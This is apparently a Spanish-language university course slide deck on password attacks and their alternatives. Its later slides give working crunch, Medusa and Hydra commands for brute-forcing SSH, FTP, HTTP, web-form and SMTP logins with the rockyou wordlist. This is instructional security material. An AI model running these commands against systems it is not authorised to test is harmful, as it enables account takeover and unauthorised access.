  • 31. • Ataque de diccionario: – Utiliza una técnica muy sencilla una lista detallada (diccionario) con nombres de usuario y/o contraseñas – El ataque consiste en probar todas y cada una de las posibles combinaciones Ataques a las contraseñas
  • 32. • Ataque de fuerza bruta: – No utiliza una lista limitada – Usa combinaciones de todas las letras, números y caracteres del teclado. Ataques a las contraseñas
  • 33. • Ataque basado en reglas – Se utiliza cuando de tiene alguna información sobre la contraseña. Ataques a las contraseñas
  • 34. • Ataque de syllabus (hibrido): Es una combinación de los ataques de diccionarios y de fuerza bruta
  • 35. • Símbolos de seguridad – Capcha: Son similares a las contraseñas e incluso se pueden combinar, la principal característica es que el usuario debe escribir un código aleatorio. Alternativas a las contraseñas
  • 36. • Controles de acceso: Se basa en la criptografía de clave pública, la llave pública se queda en el servidor y la clave privada se la lleva el usuario en un dispositivo (memoria USB, disco, token, etc.) Alternativas a las contraseñas
  • 37. • Métodos biométricos: – Reconocimiento de iris – Reconocimiento de Facial 2D y 3D – Reconocimiento vascular – Pulsaciones cardíacas – Ondas cerebrales Alternativas a las contraseñas
  • 38. • Autenticación en dos pasos: El usuario escribe su nombre de usuario y contraseña y luego recibe una llamada, mensaje de texto o correo con un código para acceder. Alternativas a las contraseñas
  • 39. • Mediante dispositivos móviles: – Existen aplicaciones específicas. – La contraseña sale desde el dispositivo móvil hasta el servidor – Puede necesitar un sitio web o servidor de un tercero Alternativas a las contraseñas
  • 40. El entorno de Kali Linux • Inicio de sesión • Recorrido rápido por las herramientas
  • 41. PASSWORD CRACKING EN KALI LINUX Ahora si
  • 42. Nombre del curso: • Seguridad Informática y sus implicaciones Legales en los ciberdelitos Duración • 40 horas (Dominical) Modalidad • Virtual Información a • dpec@uam.edu.ni • https://posgrados.uam.edu.ni Curso de Seguridad Informática en la UAM
  • 43. • El atacante ya identificó información importante: – Dirección IP - 192.168.1.1 – Puertos abiertos - puerto 80 o 25 – Protocolos - HTTP o SMTP – Nombres de usuario – admin, test, etc. Antes de iniciar el ataque de contraseñas
  • 45. Generar contraseñas con crunch crunch <min> <max> <caracteres> -t <plantilla> -o <archivo de salida> Ejemplo: • crunch 7 7 abcd987 -t abc@@@@ -o /root/file.txt
  • 48. Diccionarios en línea • Se pueden bajar diccionarios de contraseñas de varios sitios – http://www.outpost9.com/files/WordLists.html – http://packetstormsecurity.org/Crackers/wordlists/ – http://www.ai.uga.edu/ftplib/natural-language/moby/ – http://wordlist.sourceforge.net/
  • 49. Diccionarios en Kali Personalmente recomiendo descomprimir el archivo rockyou.txt.gz
  • 50. ATAQUE DE FUERZA BRUTA Con Kali Linux
  • 51. • Aplicación para realizar ataques de Fuerza Bruta • Está basado en hilos para pruebas concurrente a varios hosts, usuarios o contraseñas. • Posee un diseño modular, cada servicio existe como un módulo independiente en archivos .mod. • medusa -d para ver los módulos disponibles Medusa
  • 52. Medusa • medusa -h 192.168.56.250 -u root -P pass.txt -M ssh -n 2222 -f Host Usuarios Diccionario Módulo SSH Puerto Detenerse al encontrar un usuario y contraseña
  • 54. Medusa • medusa -h 192.168.10.12 -u profe -P pass.txt -M ssh -n 22 -f Host Usuarios Diccionario Módulo SSH Puerto Detenerse al encontrar un usuario y contraseña
  • 55. Medusa • De una forma similar puede ser usado en otros servicios medusa -h 192.168.10.105 -u k3170makan -P /usr/share/wordlists/rockyou.txt –M ftp medusa -h 192.168.10.105 -u ungaman -P /usr/share/wordlists/rockyou.txt -M http medusa -h 192.168.10.105 –u decks -P /usr/share/wordlists/rockyou.txt –M web-form
  • 57. Hydra • Es desarrollado por The Hacker's Choice (THC) es decir no tiene nada que ver con el capitán américa • También soporta variedad de protocolos • Es ideal para atacar servidores de correo porque puede centrarse en un IP y un usuario
  • 58. Hydra • hydra -l profe -p /usr/share/wordlist/rockyou.txt ssh • hydra -l admin -p /root/password.txt 192.168.1.1 smtp • hydra -L user.txt -p pass.txt http_proxy://192.168.16.1
  • 59. hydra • hydra -l profe -P pass.txt 192.168.10.12 -t 4 ssh Host Usuarios Diccionario Módulo SSH
  • 60. Más allá de Kali Linux ophcrack John the Ripper